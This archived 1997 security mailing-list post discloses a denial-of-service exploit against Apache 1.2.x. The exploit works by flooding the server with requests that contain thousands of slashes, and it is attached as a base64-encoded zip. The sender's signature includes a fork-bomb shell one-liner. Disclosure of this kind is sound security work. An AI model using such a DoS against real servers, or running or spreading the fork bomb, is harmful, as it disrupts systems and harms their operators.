Apache DoS attack?

=?UNKNOWN-8BIT?Q?Micha=B3?= Zalewski (lcamtuf@POLBOX.COM)
Tue, 30 Dec 1997 11:07:04 +0100

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Mark Whitis: "Re: StackGuard: Automatic Protection From Stack-smashing Attacks"
Previous message: Chris A. Epler: "iPass RoamServer 3.1"
Next in thread: =?US-ASCII?Q?Micha=B3_Zalewski?=: "Re: Apache DoS attack?"

This is a multi-part message in MIME format.

--Boundary_(ID_U1gxLMMkLi1p5W02PXQhhw)
Content-type: text/plain; charset=iso-8859-2
Content-transfer-encoding: quoted-printable

[execuse me if it has been discovered before]

Here's a simple exploit for Apache httpd version 1.2.x (tested on =
1.2.4).
When launched, causes incerases of victim's load average and extreme
slowdowns of disk operations. On my i586 Linux annoying slowdown has =
been
experienced immediately (after maybe 5 seconds). After about 4 minutes
work has been turned into real hell (286?).

Attached program ('beck') is a shell script. It works by sending
excessive http requests with thousands of '/'s inside (parsed from file
'beck.dat'). Single request causes just a little longer thinking of
Apache. But when requests are sent from a loop - huh, victim
system becomes slower and slower... At least on my machine, maybe when
Apache is running on a lightspeed workstation this script makes no
difference.

PS. Fast connection should help... All depends on victim's system
performance.

_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
=3D--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] =
---------=3D

--Boundary_(ID_U1gxLMMkLi1p5W02PXQhhw)
Content-type: application/x-zip-compressed; name=beck.zip
Content-disposition: attachment; filename=beck.zip
Content-transfer-encoding: base64

UEsDBBQAAgAIAGCmnSMQwy97+QEAAKADAAAEABAAYmVja1VYDADzFKg0I/+nNAAAAACFUl1P2zAU
fc+vOHgVbJqStvAydYDGumpCDJAKe1mFwHFuawvXrmynQdN+/JyPfrBNmh8iJTnn3HPO9ZuDfq5M
P+deJgkJaZsH2OfJ+AppiosVF5IwzI6zF3who7iGneOO1kqQBw+Bi2fWkS7KIK0b4VoJGXE/uKbK
PyucasGXoZx/yq33mQ/c/1Qiq3iVrfR5S04SNccMrDdkODsDY3j4iCDJJEAr/v3u4utkhN4AcXRQ
y0dpfcBMSKUL/8A63BaOVzCk4EXhyPvaffsHrjRGmUWXke1RW1G0J4WxWU3zalnqwA2RLT2ENYai
jjUes5PBKwcvKmCQzFWSjG9vbh6/XV5f3p+dDLYhjxkO/gi5B+wdN9QGe4B0jpzEc1bw8Fcnk+n0
djrCXGnC0QZ1hGUZI+eEleaCCigDUTpHJqBQLvu30W6DzT7rUnpDvF0rjt7O2H7kd/XlGAen348R
LHhuXcg29+BeknLQlhfga3J8QfDWGlRKawitljmkWkhyiMCFDD4yk0rWKWZ13rjjmLSoHQbShkLt
5sMAp9siDs/7Ba37poyChxHW9brzypBGNfa08r8WjlZIRSf1tF9612NqwMZ764wOYy+O6mtRxP1X
XIXYSZZlYA1r4/U/E9nWPWvHNpHq4zVFyLB5K6yhnRd2e1XPiCtpvv8GUEsDBBQAAgAIAHmdnSPu
voPlIgAAAPYfAAAIABAAYmVjay5kYXRVWAwAZwSoNGbvpzQAAAAA7cFBEQAABACwvxQaSOEU0D+L
HO62TW8WAAAAAAAAAPBPHFBLAQIVAxQAAgAIAGCmnSMQwy97+QEAAKADAAAEAAwAAAAAAAEAAED/
gQAAAABiZWNrVVgIAPMUqDQj/6c0UEsBAhUDFAACAAgAeZ2dI+6+g+UiAAAA9h8AAAgADAAAAAAA
AQAAQLaBKwIAAGJlY2suZGF0VVgIAGcEqDRm76c0UEsFBgAAAAACAAIAgAAAAIMCAAAAAA==

--Boundary_(ID_U1gxLMMkLi1p5W02PXQhhw)--

Next message: Mark Whitis: "Re: StackGuard: Automatic Protection From Stack-smashing Attacks"
Previous message: Chris A. Epler: "iPass RoamServer 3.1"
Next in thread: =?US-ASCII?Q?Micha=B3_Zalewski?=: "Re: Apache DoS attack?"